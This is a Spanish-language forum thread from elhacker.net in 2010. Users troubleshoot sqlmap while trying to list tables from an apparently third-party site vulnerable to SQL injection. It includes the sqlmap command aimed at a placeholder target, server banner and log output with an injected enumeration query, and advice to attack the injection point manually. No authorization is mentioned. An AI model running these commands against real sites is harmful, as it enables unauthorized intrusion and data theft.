elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Curso de javascript por TickTack


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Ayuda con Sqlmap		0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ayuda con Sqlmap  (Leído 5,174 veces)
N_q_N

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Ayuda con Sqlmap
« en: 10 Diciembre 2010, 14:04 pm »
Buenas, les comento mi situación. Estoy analizando un site que podría ser vulnerable a Sql injection, utilizo Sqlmap y logro ver una DB, luego quiero extraer las Tablas y me dice que tiene 14 tablas pero me aparecen todas vacías y no puedo continuar:
Ejecuto esto:

sudo ./sqlmap.py -u "http://www.SITEVULNERABLE.com/noticias_ampliar.asp?id=579" --tables -D TTBD

y me salen las 14 tablas vacías....

banner:
---
Microsoft SQL Server  2000 - 8.00.760 (Intel X86)
   Dec 17 2002 14:22:05
   Copyright (c) 1988-2003 Microsoft Corporation
   Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
---

current database:    'TTBD'

Database: TTBD
[14 tables]
+--+
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
|  |
+--+
En línea
3st3

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Ayuda con Sqlmap
« Respuesta #1 en: 14 Diciembre 2010, 19:39 pm »
Esta dificil me manda un error

[15:34:17] [INFO] retrieved: 14
[15:36:03] [INFO] performed 20 queries in 105 seconds
[15:36:03] [INFO] query: SELECT TOP 1 ISNULL(CAST(name AS VARCHAR(8000)), CHAR(32)) FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) AND name NOT IN (SELECT TOP 0 name FROM TMTBD..sysobjects WHERE xtype IN (CHAR(117), CHAR(118)) ORDER BY name ASC) ORDER BY name ASC
[15:36:03] [INFO] retrieved: [15:36:04] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request

Avisa si lo has solucionado
Saludos
En línea
N_q_N

Desconectado Desconectado

Mensajes: 21



Ver Perfil
Re: Ayuda con Sqlmap
« Respuesta #2 en: 14 Diciembre 2010, 20:26 pm »
Aún no, pero voy a intentar con alguna otra herramienta de sql i.
Y aparte sólo aparece esa BD.

Gracias igual
En línea
EvilGoblin


Desconectado Desconectado

Mensajes: 2.323


YO NO LA VOTE!


Ver Perfil
Re: Ayuda con Sqlmap
« Respuesta #3 en: 15 Diciembre 2010, 17:11 pm »
probaste manualmente atacar a ver q resultados tenias?
En línea
Experimental Serial Lain [Linux User]
berz3k
Colaborador
***
Desconectado Desconectado

Mensajes: 1.212



Ver Perfil
Re: Ayuda con Sqlmap
« Respuesta #4 en: 18 Diciembre 2010, 07:32 am »
Las tablas y rows son enormes y tarda en compilar toda la info, os recomiendo encontrar el inject y de ahi partir de forma manual.

-berz3k.
En línea
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Sqlmap pretty urls
Nivel Web 		cgvwzq 4 4,037 Último mensaje 8 Mayo 2010, 11:44 am
por cgvwzq
Ayuda con Sqlmap
Nivel Web 		N_q_N 0 2,387 Último mensaje 14 Febrero 2011, 14:53 pm
por N_q_N
Sql injection with Sqlmap
Nivel Web 		delorean 0 3,743 Último mensaje 19 Febrero 2011, 19:11 pm
por delorean
Evadiendo Web Application Firewalls con SQLMap
Nivel Web 		hkm 0 3,511 Último mensaje 1 Septiembre 2011, 00:28 am
por hkm
Problema con sqlmap
Nivel Web 		Shell Root 0 2,262 Último mensaje 5 Abril 2013, 05:51 am
por Shell Root
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines